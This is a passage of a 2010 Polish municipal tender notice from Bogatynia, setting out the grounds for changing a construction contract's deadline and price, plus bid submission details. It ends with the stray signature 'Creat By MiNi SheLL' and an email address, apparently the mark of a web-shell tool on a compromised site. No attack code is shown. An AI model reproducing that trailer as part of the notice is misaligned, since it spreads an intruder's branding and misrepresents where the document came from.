3)wystąpienia warunków atmosferycznych ( np. niskie dobowe temperatury , długotrwałe opady deszczu lub śniegu itp.) uniemożliwiających wykonywanie robót  zgodnie z technologią określoną w dokumentacji projektowej - fakt ten musi mieć odzwierciedlenie w dzienniku budowy i musi być potwierdzony przez inspektora nadzoru;
4) jeżeli w trakcie budowy zaszła konieczność wykonania nieprzewidzianych robót lub zamawiający dokonał istotniej zmiany projektu,
5) wystąpienia konieczność wykonania robót zamiennych, wynikająca z: zmiany technologii wykonania robót, rodzaju materiałów, zaleconych przez inspektora nadzoru, lub projektanta, zmiany dokumentacji projektowej, w szczególności w przypadku konieczności zwiększenia bezpieczeństwa wykonania robót lub usprawnienia procesu budowy (art. 23 pkt. 1 Prawa budowlanego), lub wskutek poprawienia błędów projektowych
Maksymalny okres zmiany terminu zakończenia robót powinien być równy okresowi przerwy lub przestoju. W przypadku wystąpienia przyczyn, o których mowa powyżej Strony ustalą nowe terminy wykonania przedmiotu umowy i wprowadzą je pisemnym aneksem do umowy,
6)	wystąpienia okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności;
7)	wykopalisk uniemożliwiających wykonywanie robót;
8)  konieczności wykonania robót dodatkowych nie ujętych w przedmiarach, a zawartych w dokumentacji.
21.5.5.2. Cena może być zmieniona gdy:
a) nastąpi urzędowa zmiana wysokości podatku VAT;
b) wystąpi istotna różnica między obmiarem projektowym, a obmiarem powykonawczym oraz wystąpi konieczność wykonania robót dodatkowych;
c) Zamawiający ograniczy zakres zamówienia, wprowadzi zamienne rozwiązania lub materiały.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bogatynia.pl (zamówienia publiczne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Bogatynia, ul. Daszyńskiego 1, 59-920 Bogatynia
Wydział Zamówień Publicznych, ul. 1-go Maja 29,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.06.2010 godzina 10:30, miejsce: Ofertę należy  złożyć/przesłać do  Zamawiającego - Urząd Miasta i Gminy Bogatynia,  ul. Daszyńskiego 1, 59-920 Bogatynia /Biuro Obsługi Interesanta - pokój nr 3/.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com